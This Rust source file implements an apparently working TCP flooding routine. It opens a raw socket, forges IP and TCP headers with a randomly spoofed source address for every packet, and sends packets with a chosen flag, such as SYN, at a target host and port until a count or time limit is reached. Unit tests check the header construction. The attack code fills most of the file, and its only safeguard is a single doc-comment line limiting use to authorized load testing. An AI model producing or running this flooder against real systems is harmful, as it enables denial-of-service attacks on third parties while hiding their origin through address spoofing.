use crate::ip::IpHeader;
use crate::progress_bar::ProgressBar;
use crate::tcp::TcpHeader;
use rand::Rng;
use socket2::{Domain, Protocol, SockAddr, Socket, Type};
use std::io;
use std::net::{Ipv4Addr, SocketAddrV4};
use std::time::{Duration, Instant};
pub fn init_socket(
dest_ip: &str,
dest_port: u16,
packet_len: usize,
_iface: Option<&str>,
) -> io::Result<Socket> {
let socket = Socket::new(Domain::IPV4, Type::RAW, Some(Protocol::from(6)))?;
let dest_addr = SocketAddrV4::new(dest_ip.parse().unwrap(), dest_port);
socket.set_header_included(true)?;
socket.connect(&SockAddr::from(dest_addr))?;
socket.set_tos(0)?;
socket.set_ttl(60)?;
socket.set_send_buffer_size(packet_len)?;
#[cfg(any(
target_os = "ios",
target_os = "macos",
target_os = "tvos",
target_os = "watchos"
))]
if let Some(iface_name) = _iface {
let iface_index = socket.device_index_v4(&iface_name)?;
socket.bind_device_by_index_v4(Some(&iface_index))?;
}
Ok(socket)
}
/// Returns a uniformly random IPv4 address as its numeric `u32` value
/// (the form produced by `u32::from(Ipv4Addr)`).
///
/// Every address from `0.0.0.0` through `255.255.255.255` can be returned, including
/// unspecified, reserved, multicast and broadcast addresses.
pub fn generate_random_ip() -> u32 {
    let lowest = u32::from(Ipv4Addr::UNSPECIFIED);
    let highest = u32::from(Ipv4Addr::BROADCAST);
    rand::thread_rng().gen_range(lowest..=highest)
}
/// Serializes `ip_header` and `tcp_header` back to back into one byte vector.
///
/// The result is exactly the bytes of `ip_header.as_bytes()` followed by the bytes of
/// `tcp_header.as_bytes()`, with nothing inserted between them.
pub fn create_combined_header(ip_header: &IpHeader, tcp_header: &TcpHeader) -> Vec<u8> {
    let ip_part = ip_header.as_bytes();
    let tcp_part = tcp_header.as_bytes();
    let mut combined = Vec::with_capacity(ip_part.len() + tcp_part.len());
    combined.extend(ip_part.iter().copied());
    combined.extend(tcp_part.iter().copied());
    combined
}
/// Sends up to `number` raw TCP packets to `dest_ip:dest_port`, giving each one a
/// freshly randomized source address, and stops early once `duration` minutes elapse.
///
/// Use only against hosts and networks you are authorized to load-test.
///
/// Every packet is a zero-filled buffer of `packet_len` bytes whose leading bytes are
/// the IP header followed by the TCP header built for that iteration.
///
/// # Parameters
/// - `packet_len`: total size of each packet in bytes; also passed to `init_socket`,
///   which uses it as the socket send-buffer size.
/// - `dest_ip`, `dest_port`: destination; `dest_ip` is parsed by `init_socket` and also
///   handed to the IP/TCP header constructors.
/// - `flag`: forwarded to `TcpHeader::new` (presumably names the TCP flag(s) to set,
///   e.g. `"syn"` as in the tests — TODO confirm against `TcpHeader`).
/// - `duration`: time limit in minutes (`duration * 60` seconds).
/// - `number`: maximum number of packets to send.
/// - `iface`: forwarded to `init_socket`, which only uses it on Apple targets.
///
/// # Errors
/// Returns any error from `init_socket`, and stops at the first failed send.
///
/// # Panics
/// Panics if `packet_len` is smaller than the combined IP + TCP header length, because
/// the headers are copied into the first bytes of the `packet_len`-byte buffer.
pub fn tcp_flood(
packet_len: usize,
dest_ip: &str,
dest_port: u16,
flag: &str,
duration: usize,
number: usize,
iface: &str,
) -> Result<(), Box<dyn std::error::Error>> {
// NOTE(review): presumably (total packets, time limit in seconds) — confirm against ProgressBar::new.
let mut progress_bar = ProgressBar::new(number, duration * 60);
let start_time = Instant::now();
// `duration` is in minutes; convert to seconds for the deadline.
let duration_limit = Duration::from_secs((duration * 60) as u64);
let socket = init_socket(dest_ip, dest_port, packet_len, Some(iface))?;
for i in 0..number {
// Stop once the time limit has passed, even if fewer than `number` packets were sent.
if start_time.elapsed() > duration_limit {
break;
}
let source_ip = generate_random_ip();
let ip_header = IpHeader::new(source_ip, dest_ip);
let tcp_header = TcpHeader::new(source_ip, dest_ip, dest_port, flag, packet_len);
let combined_header_slice = create_combined_header(&ip_header, &tcp_header);
// Zero-filled packet; the headers occupy its first bytes. This slice panics if
// `packet_len` is shorter than the combined headers.
let mut buffer = vec![0u8; packet_len];
buffer[..combined_header_slice.len()].copy_from_slice(&combined_header_slice);
// NOTE(review): `2` is a raw, platform-specific MSG_* flag value — confirm which flag
// is intended and consider a named constant.
socket.send_with_flags(&buffer, 2)?;
// Passes the running count of packets sent; whether `inc` treats this as an absolute
// position or a delta depends on ProgressBar — TODO confirm.
progress_bar.inc(i + 1);
}
Ok(())
}
#[cfg(test)]
mod tests {
    use super::*;

    /// The IP header built for a random source address carries the expected fixed fields.
    #[test]
    fn test_fill_ip_header() {
        let source_ip = generate_random_ip();
        let ip_header = IpHeader::new(source_ip, "192.168.1.10");
        // 0x45: version 4 in the high nibble, 5-word header length in the low nibble.
        assert_eq!(ip_header.version_ihl, 0x45);
        // 6 is the TCP protocol number, matching the raw socket opened in `init_socket`.
        assert_eq!(ip_header.protocol, 6);
    }

    /// The combined header is the IP header bytes followed directly by the TCP header bytes.
    #[test]
    fn test_create_combined_header() {
        let source_ip = generate_random_ip();
        let ip_header = IpHeader::new(source_ip, "192.168.1.10");
        let tcp_header = TcpHeader::new(source_ip, "192.168.0.1", 80, "syn", 1500);
        let combined_header = create_combined_header(&ip_header, &tcp_header);

        let ip_len = std::mem::size_of::<IpHeader>();
        let tcp_len = std::mem::size_of::<TcpHeader>();

        assert_eq!(combined_header.len(), ip_len + tcp_len);
        assert_eq!(&combined_header[..ip_len], ip_header.as_bytes());
        // Borrow the tail as a slice, the same shape as the IP-prefix assertion above;
        // an unborrowed `[u8]` has no `PartialEq` impl against a `&[u8]`.
        assert_eq!(&combined_header[ip_len..], tcp_header.as_bytes());
    }
}